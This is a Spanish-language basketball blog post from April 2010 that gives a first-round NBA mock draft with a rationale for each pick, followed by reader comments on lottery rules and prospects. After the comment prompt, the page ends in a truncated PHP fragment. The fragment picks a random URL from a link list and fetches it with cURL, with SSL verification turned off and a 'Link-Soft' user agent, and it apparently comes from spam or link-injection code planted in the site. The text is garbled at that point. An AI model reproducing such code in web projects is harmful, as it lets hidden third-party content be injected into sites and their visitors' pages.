Mock Draft 2010 – Abril

21 de April de 2010 por kantonyo

Después de la finalización del March Madness y la temporada regular en la NBA, es tiempo de analizar cómo se presenta este año el próximo Draft. A la espera de que se sorteen los tres primeros puestos en el Lottery Draft, analizamos las necesidades y posibles elecciones de las franquicias según su puesto en la liga regular:

1. New Jersey Nets – John Wall (Kentucky) Base – 1990

Los Nets hace tiempo que sólo piensan en el próximo año, y en especial, en poder elegir en primer lugar, a pesar de que desde 2004 al peor equipo no le ha tocado ese privilegio. Evan Turner debería ser la elección viendo las necesidades de la plantilla y después de haberse proclamado mejor jugador de la NCAA. Un trío exterior formado por Harris, Lee y Turner suena bastante bien, pero por el momento nadie da un duro porque John Wall no sea elegido en el primer puesto.

2. Minnesota Wolves – Evan Turner (Ohio State) Base/Escolta – 1988

A pesar de que el año pasado los Wolves eligieron a dos bases en los primeros puestos del draft, parece que esta posición todavía debe ser mejorada teniendo en cuenta que a Ricky Rubio no se le espera hasta 2012 como mínimo. Turner es muy versátil, y puede llegar a jugar de base, escolta o alero, por lo que puede complementarse bien con Flynn o Sessions.

3. Sacramento Kings – Wesley Johnson (Syracuse) Alero – 1987

Los Kings deberán elegir entre apuntalar su juego interior con jugadores como Cousins, Favors o Aldrich o en cambio intentar juntar a una pareja que puede marcar época: Wesley Johnson y Tyreke Evans. Wesley es un jugador totalmente preparado para jugar en una franquicia sin presión como los Kings, y aportará desde el principio.

4. Golden State Warriors – DeMarcus Cousins (Kentucky) Alapívot – 1990

Es impensable que los Warriors busquen un exterior en el draft con toda la artillería de la que disponen, por lo que intentaran mejorar su juego interior. Teniendo a Biedrins en plantilla parece que no es necesario un pívot como Cole Aldrich, por lo que deberán apostar por DeMarcus Cousins, un alapívot muy físico y fuerte que cubre las carencias de jugadores como Anthony Randolph, mucho más frágil en defensa.

5. Washington Wizards – Cole Aldrich (Kansas) Pívot – 1988

Si los Wizards eligen en esta posición va a ser difícil encontrar un jugador exterior merecedor de un puesto tan alto. Tienen dos opciones: o elegir un alero como Aminu o un pívot como Aldrich. A pesar de contar con el prometedor McGee, podrían finalmente decantarse por colocar al pívot de Kansas al lado de Blatche para ganar músculo y garra en la pintura.

6. Philadelphia 76ers – Derrick Favors (Georgia Tech) Alapívot – 1991

Teniendo en cuenta el fracaso obtenido con Elton Brand, los Sixers deberán buscar mejorar su juego interior. Tanto Favors o Monroe son las dos opciones más lógicas. Ambos son jugadores que han rendido por debajo de lo que se esperaba de ellos. Favors es un jugador jovencísimo y tiene un margen de progresión enorme.

7. Detroit Pistons – Greg Monroe (Georgetown) Alapívot – 1990

A pesar de que Greg Monroe ha perdido parte del prestigio con el que llegó a la NCAA puede ser elegido en el top10, sobretodo teniendo en cuenta las carencias de los equipos que eligen en los primeros puestos. Los Pistons necesitan mejorar su juego interior, aunque les vendría mejor un pívot de corte clásico como Aldrich.

8. Los Angeles Clippers – Al-farouq Aminu (Wake Forest) Alero – 1990

Los Clippers necesitan urgentemente un base, pero saliendo de esta posición va a ser difícil que lo puedan elegir por lo que buscaran seguramente mejorar la posición de alero tras la marcha de Al Thornton. La duda puede estar entre Aminu, James Anderson o el checo Vesely.

9. Utah Jazz – Xavier Henry (Kansas) Escolta – 1991

Los Jazz son el único equipo clasificado para los playoffs que va a poder elegir entre los 10 primeros en el draft. Al disponer de una plantilla muy compensada será difícil mejorar un puesto de titular, por lo que buscaran futuro, y que mejor que el elegante jugador de Kansas, el escolta Xavier Henry.

10. Indiana Pacers – Avery Bradley (Texas) Escolta – 1990

Es difícil pensar que bases como Bledsoe, Vasquez o Warren salgan tan arriba, por lo que los Pacers deberán buscar un escolta o un alapívot. El joven Avery Bradley puede ser una apuesta a largo plazo.

11. New Orleans Hornets – James Anderson (Oklahoma St) Escolta/Alero – 1989

El puesto de alero es el más débil en la plantilla de New Orleans. James Anderson es uno de los mejores anotadores del año en la NCAA y puede ser un valor seguro. Aunque también jugadores como Singler o Vesely pueden ser útiles en los Hornets.

12. Miami Heat – Ed Davis (North Carolina) Alapívot – 1989

Los Heat no podrán tampoco reforzar su puesto de base, por lo que buscaran un jugador que mejore su juego interior. Ed Davis ha tenido una temporada muy por debajo de lo esperado y ha estado lesionado los últimos meses por lo que existen dudas sobre su participación en el draft. Si al final decide presentarse estará en top 15 casi seguro.

13. Memphis Grizzlies – Jan Vesely (Partizan) Alero/Alapívot – 1990

Ante la posible marcha de Rudy Gay este verano, los Grizzlies deberán reforzar su puesto de alero. Vesely, Singler y Paul George pueden ser buenas opciones. El checo ha tenido una gran temporada, llegando a la Final Four con Partizan en la Euroliga.

14. Milwaukee Bucks – Kyle Singler (Duke) Alero/Alapívot – 1988

El MVP de la Final Four de la NCAA, Kyle Sinlger, recuerda bastante a Dirk Nowitzki tanto en juego como físicamente, pero con el gran hándicap de medir 8 centímetros menos. Puede ser un gran complemento a una plantilla con Jennings, Salmons, Delfino y Bogut.

15. Houston Rockets – Ekpe Udoh (Baylor) Alapívot/Pívot – 1987

Ekpe Udoh ha ganado bastante prestigio después de un gran torneo de la NCAA donde ha demostrado ser uno de los mejores jugadores defensivos del año. Con la incógnita de la recuperación de Yao Ming, urge bastante la adquisición de un interior de sus características.

16. Minnesota Wolves – Paul George (Fresno State) Alero – 1990

En su segunda elección en el draft, los Wolves intentaran seguir reforzando su perímetro. Paul George se ha colado en los puestos altos a pesar de jugar en una Universidad muy modesta dentro de una conferencia débil. Físicamente nos recuerda bastante a Danny Granger.

17. Chicago Bulls – Hassan Whiteside (Marshall) Pívot – 1989

A pesar del buen año de Taj Gibson y Noah, los Bulls todavía necesitan mejorar su juego en la pintura, con un pívot de corte más clásico. Al igual que George, Hassan ha saltado a los puestos altos del draft desde una universidad modesta gracias sobre todo a sus promedios en rebotes y tapones. Posiblemente estamos ante uno de los pívots con más potencial de este año, y sólo su ausencia en el March Madness puede frenarle su progresión en el puesto final.

18. Miami Heat – Eric Bledsoe (Kentucky) Base – 1990

Los Heats después de haber elegido en el puesto 12, deberán elegir esta vez a un base. El mejor candidato es el suplente de John Wall en los Wildcats, el jugador de primer año Eric Bledsoe. Su talento ha estado a la sombra de Wall, y podría esperar un año más para dar el salto a la NBA, y así de este modo optar a un top 10 la próxima temporada.

19. Oklahoma City Thunder – Solomon Alabi (Florida State) Pívot – 1988

Los Thunder posiblemente dispongan de una de las plantillas con más potencial de la competición. Pero si hay un puesto en el que todavía no han encontrado un jugador referencia es el puesto de pívot. A la espera de que Serge Ibaka acabe de madurar lo suficiente podrían decantarse por el jugador más alto de los aspirantes al draft, el nigeriano Solomon Alabi.

20. San Antonio Spurs – Donatas Motiejunas (Benetton Treviso) Alapívot – 1990

El jugador lituano Donatas Motiejunas fue nombrado MVP del europeo sub18 de 2008. Muchos mockdraft lo sitúan en el top 10 del draft a pesar de ser un jugador desconocido para el público norteamericano y de pertenecer a un equipo de media tabla de la liga italiana. Su posición final puede variar bastante, e incluso podría llegar a convertirse en un robo si recala en un equipo como los Spurs.

21. Portland Trail Blazers – Jarvis Varnado (Mississippi State) Pívot – 1988

Tras la lesión de Greg Oden surgen algunas dudas acerca de la fortaleza física del nº 1 del draft de 2008. Además no está clara la renovación de Camby debido sobre todo a su edad por lo que los Blazers podrían buscar refuerzos en el poste alto. Jarvis Varnado ha conseguido este año el record de tapones en la NCAA y has sido elegido el mejor jugador defensivo del año. Gani Lawal o Renardo Sidney, que este año ha estado en blanco, también podrían ser buenas opciones.

22. Boston Celtics –Gani Lawal (Georgia Tech) Alapívot/Pívot – 1988

Los Celtics continúan necesitando poder interior tras el fracaso de la incorporación de Rasheed Wallace. Al igual que Portland, podrían elegir entre Lawal o Sidney.

23. Minnesota Wolves – Quincy Pondexter (Washington) Alero/Alapívot – 1988

En su tercera elección, los Wolves podrían apostar por mejorar su juego interior, sobre todo si Al Jefferson no continúa, o por terminar de apuntalar el juego exterior. Tanto Quincy como Patterson pueden ser buenas opciones para los Wolves para aportar musculo en el poste alto, aunque el de Washington aporta más versatilidad y recursos a la pareja Love-Jefferson.

24. Memphis Grizzlies – Greivis Vasquez (Maryland) Base – 1987

Muy pocos confían en que el venezolano opte a puestos tan altos, pero las necesidades de los Grizzlies podrían provocar esta elección. Greivis es un base puro, muy inteligente y totalmente preparado para coger las riendas de un equipo como el de Memphis. Personalmente es un jugador que me encanta.

25. Atlanta Hawks – Gordon Hayward (Butler) Alero – 1990

Los Hawks necesitan reforzar su puesto de alero o buscar alternativas a Horford. Gordon Hayward ha sido una de las atracciones del March Madness con Butler y podría ser un buen suplente de Marvin Williams que este año ha frenado su progresión.

26. Oklahoma City Thunder – Devin Ebanks (West Virginia) Alero – 1989

Ante la grave lesión de Dasean Butler, Devin Ebanks puede ser el único jugador de West Virginia en entrar en el draft después de llegar a la Final Four. Los Thunder podrían elegirle para aportar físico y ritmo saliendo desde el banco.

27. New Jersey Nets – Patrick Patterson (Kentucky) Alapívot – 1989

Es complicado que Patterson caiga hasta este puesto tan bajo, pero si se dan las circunstancias, los Nets estarían encantados de juntarlo con su actual compañero de equipo, John Wall. Sería un gran complemento de Brook Lopez.

28. Memphis Grizzlies – Jordan Crawford (Xavier) Escolta – 1988

El escolta anotador Jordan Crawford podría ser un buen suplente de OJ Mayo. Jordan saltó a la fama por su mate en la cara de LeBron James en un entrenamiento y nos acabó de convencer por su gran torneo NCAA con la Universidad de Xavier.

29. Orlando Magic – Stanley Robinson (Connecticut) Alero – 1988

Orlando intentará mejorar su puesto de alero, que es el más débil de la plantilla. Robinson, o Damion James pueden ser buenas opciones. El jugador de Connecticut destaca por su potente físico y buena defensa.

30. Washington Wizards – Shelvin Mack (Butler) Base – 1990

Los Wizards intentaran pescar un base en esta nueva elección. Willie Warren es el base que más alto aparece en los mockdraft, a pesar de un mal año después de que su compañero en Oklahoma, Blake Griffin, diera el salto a la NBA. Pero la gran actuación de Shelvin en el torneo NCAA, podría auparle a la primera ronda del draft.

Comenta

14 comentarios a esta entrada

  1. Uno cualquiera dice:
    #1

    Sólo un apunte: no se sortean sólo los 3 primeros puestos de elección, sino que se sortean los 14 primeros.

    Así que Utah puede que no elija entre los 10 primeros (para más info: http://en.wikipedia.org/wiki/NBA_Draft_Lottery )

      Citar

  2. sergio dice:
    #2

    No, se sortean los 3 primeros entre los 14 últimos, y el resto sigue el orden de partidos ganados. Es decir, imaginemos que coge el nº 1 sacramento, el 2 minnesotta y el 3 Philadelphia…. pues el resto serían por orden. Es decir: Nets-Warriors-Wizards… y así. De hecho es lo que dice en la página que nos has puesto

      Citar

  3. sergio dice:
    #3

    Ah! que quería decir algo y no lo he dicho… Kantonyo, eres tu quien se merece el nº1 del draft. Ni sorteos ni pollas. Como te lo curras ….

      Citar

  4. Kantonyo dice:
    #4

    Efectivamente, es como dice Sergio, aunque la verdad que con mi comentario no he sido del todo claro, dando a entender que los otros equipos no clasificados para el draft, no entran en el sorteo. Por seguir tu ejemplo, Utah sólo puede ser 1º, 2º, 3º o 9º, en este caso por que Utah se ha quedado con la plaza de New York.

    De todas formas seguro que hay algún error en las plazas, son un poco provisionales, ya que según he visto en varios Mockdrafts, no coinciden en los empates (yo cuento enfrentamientos entre implicados) de la season ni en algunos traspasos (???) por lo que más adelante, cuando se celebre el Lottery Draft lo actualizaremos. Además en el momento que lo escribí, la plaza de Toronto se comentaba que iba para Miami, ahora parece que en muchas webs especializadas lo han cambiado.

      Citar

  5. Kantonyo dice:
    #5

    Corrijo, en parte tiene razon “Uno cualquiera”

    Ya que si el 10º, 11º y 12º sale en las tres primeras plazas, utah sería iria al 10º, 11º o 12º si los otros salieron en los tres primeros.. Joer que Lio!!

    jajajaja

      Citar

  6. Uno cualquiera dice:
    #6

    Cierto, se sortean los 3 primeros y el resto quedan en orden de clasificación.

    Por cierto, que antes no lo he dicho, muy grande el análisis 🙂

      Citar

  7. Txusma dice:
    #7

    No tenía yo la idea de que Evan Turner fuera un base, de hecho lo veía más como un 2-3…

      Citar

  8. portu dice:
    #8

    Turner de 1 no tiene demasiada pinta, es bastante alto, pero está claro q Minesota necesita algo de talento en el juego exterior y no desde el puesto de base. Es el jugador q mejor les viene aunque tampoco hay q destacar otra apuesta de jugador interior si caen al 3er puesto y luego ya veremos qué hacen con lo q tienen…

      Citar

  9. Kantonyo dice:
    #9

    Evan Turner ha jugado toda la temporada de base en Ohio State. Es un caso muy parecido al de Tyreke Evans, aunque su puesto natural es escolta e incluso podría jugar de alero ha jugado en ese puesto. Dependerá del equipo donde sea elegido para tener más claro donde va a jugar.

      Citar

  10. serrano dice:
    #10

    Buenas,

    os sigo desde hace tiempo y el nivel del blog es buenisimo, y aumentando en los ultimos meses con los nuevos articulos.
    os dejo un link que he encontrado sobre el sorteo de draft y posibilidades de cada equipo para consegui el Nº1.

    http://www.basketdraft.com/2010/04/que-posibilidades-tiene-cada-equipo-de.html

    como dice el link los empates de la Regular Season se resuelven con una moneda al aire entre dos equipos.

    un saludo y a seguir igual

      Citar

  11. Kantonyo dice:
    #11

    Muchas gracias Serano por el enlace, con esto queda mucho más claro. La verdad que yo no tenía ni idea de que los empates en la season se solucionaban de esta forma.

      Citar

  12. Kantonyo dice:
    #12

    Parece que Kyle Singler no se va a presentar al próximo draft. El MVP de la Final Four de este año jugara su cuarta temporada con Duke en vez de dar el salto este año a la NBA. Es curioso con el título en el bolsillo, que mejor manera de dar por zanjada su etapa en los Blue Devils.

    http://sports.espn.go.com/ncb/news/story?id=5115934

      Citar

  13. Txusma dice:
    #13

    Y con esto Duke pasa a ser el máximo favorito para el año que viene? Creo que han fichado/reclutado al mejor base de la promoción, no?

      Citar

  14. sergio dice:
    #14

    Que yo sepa, varios números uno del draft han sido elegidos por uno u otro equipo en función del resultado de una moneda…

    Y, por mi parte, bienvenido serrano… siempre es bueno que comentes y dejes tu opinion. Así empece yo y al final me han liao..

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>